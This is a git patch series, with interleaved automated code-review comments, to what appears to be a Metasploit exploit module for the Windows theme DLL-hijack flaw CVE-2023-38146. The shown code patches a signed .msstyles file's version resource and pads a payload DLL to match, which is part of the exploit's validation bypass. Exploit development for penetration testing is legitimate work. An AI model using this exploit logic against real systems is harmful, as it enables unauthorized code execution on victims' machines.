From 3ac9c0c38a72246e004736d65eb0224ff94fc17f Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Tue, 19 Dec 2023 17:05:01 -0500
Subject: [PATCH 1/2] Patch in the theme version to the MSStyles file

---
 .../theme_dll_hijack_cve_2023_38146.rb | 18 +++++++++++-------
 1 file changed, 11 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
index 84c930cc29c9..e8bbf99004a4 100644
--- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
+++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -21,7 +21,8 @@ def initialize(info = {})
 'DisclosureDate' => '2023-09-13',
 'Author' => [
 'gabe_k', # Discovery/PoC
- 'bwatters-r7' # msf exploit
+ 'bwatters-r7', # msf exploit
+ 'Spencer McIntyre' # msf exploit
 ],
 'References' => [
 ['CVE', '2023-38146'],
@@ -39,15 +40,15 @@ def initialize(info = {})
 'Stability' => [CRASH_SAFE],
 'Reliability' => [REPEATABLE_SESSION],
 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
- }
+ },
+ 'DefaultOptions' => { 'DisablePayloadHandler' => false }
 )
 )
 
 register_options([
+ OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).' '' ], regex: /.*\w*\.msstyles$/),
 OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
- OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]),
- OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']),
- OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation'])
+ OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
 ])
 
 deregister_options(
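Review bot: The `regex:` on the newly added STYLE_FILE option, `/.*\w*\.msstyles$/`, anchors with `$`, which in Ruby matches at the end of any line rather than the end of the string, so a value containing a newline before a final `.msstyles` line would still be accepted; `\z` pins the whole string, e.g. `regex: /\.msstyles\z/`. The leading `.*\w*` adds nothing because the pattern is not anchored at the start. The STYLE_FILE_NAME regex on the following context line, `/^\w*(\.msstyles)?$/`, has the same `^`/`$` anchoring and should use `\A`/`\z` as well; both lines reappear unchanged in the second patch's `@@ -46,7 +46,7 @@` hunk.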
@@ -69,7 +70,7 @@ def setup
 end
 
 def primer
- legit_dll = File.binread(datastore['MS_SIGNED_DLL'])
+ legit_dll = File.binread(datastore['STYLE_FILE'])
 payload_dll = generate_payload_dll
 max_length = [payload_dll.length, legit_dll.length].max
 # make sure that the lengths are the same by padding the smaller to the length of the larger
@@ -99,7 +100,10 @@ def get_file_contents(client:)
 print_status("Sending file to #{client.peerhost}")
- File.binread(datastore['MS_VERSION_FILE'])
+ pe_raw = File.binread(datastore['STYLE_FILE'])
+ pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
+ version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
+ pe_raw[...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
 end
 
 def make_theme

From 6f17088e33c53a9a9db3e2c203ee69ffbe0178a5 Mon Sep 17 00:00:00 2001
From: bwatters
Date: Wed, 20 Dec 2023 16:44:49 -0600
Subject: [PATCH 2/2] Fix some linting

---
 .../windows/fileformat/theme_dll_hijack_cve_2023_38146.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
index e8bbf99004a4..cd40530e6e31 100644
--- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
+++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -46,7 +46,7 @@ def initialize(info = {})
 )
 
 register_options([
- OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).' '' ], regex: /.*\w*\.msstyles$/),
+ OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
 OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
 OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
 ])
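Review bot: The changed line keeps the local name `legit_dll` even though it now holds the `.msstyles` file read from STYLE_FILE, so the name no longer describes the buffer it names; `legit_pe = File.binread(datastore['STYLE_FILE'])` with the matching rename in `max_length = [payload_dll.length, legit_pe.length].max` on the context line below would read more clearly. The body of `primer` continues past the end of this hunk.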
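Review bot: On the third added line of `get_file_contents`, `pe.resources['/PACKTHEM_VERSION/0/0']` is dereferenced with `.rva` and no nil check, so a STYLE_FILE that parses as a PE but carries no such resource raises NoMethodError inside the request handler instead of a readable error; a guard such as `version_res = pe.resources['/PACKTHEM_VERSION/0/0']` followed by `fail_with(Failure::BadConfig, 'STYLE_FILE has no PACKTHEM_VERSION resource') unless version_res` before computing the offset reports it cleanly (if fail_with is not appropriate from inside the server callback, a print_error plus an early return is the alternative — confirm what the caller accepts). `Rex::PeParsey::Pe.new_from_string` presumably raises on a non-PE input as well, so parsing and validating STYLE_FILE once in `setup` would surface a bad file before the server starts serving and avoid re-reading and re-parsing it on every request, given that `primer` already reads the same file. The literal `999` on the last added line should be a named constant with a comment stating what the served file's version field must hold and why, e.g. `PATCHED_THEME_VERSION = 999`. The same added lines appear as context in the second patch's `@@ -103,7 +103,7 @@` hunk.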
@@ -103,7 +103,7 @@ def get_file_contents(client:)
 pe_raw = File.binread(datastore['STYLE_FILE'])
 pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
 version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
- pe_raw[...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
+ pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
 end
 
 def make_theme
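Review bot: The rewritten line assembles the served file from three slices joined with `+`, which copies the whole buffer twice and keeps the slice bounds and the `+ 2` in sync by hand; since `pe_raw` is a fresh String from `File.binread`, an in-place splice is simpler: `pe_raw[version_offset, 2] = [999].pack('v')` followed by `pe_raw` as the method's last expression. Both forms depend on the version field being two bytes wide, which the `'v'` pack directive and the `+ 2` (or the `2` length in the splice) encode separately, so a one-line comment naming the field width next to the write would tie them together.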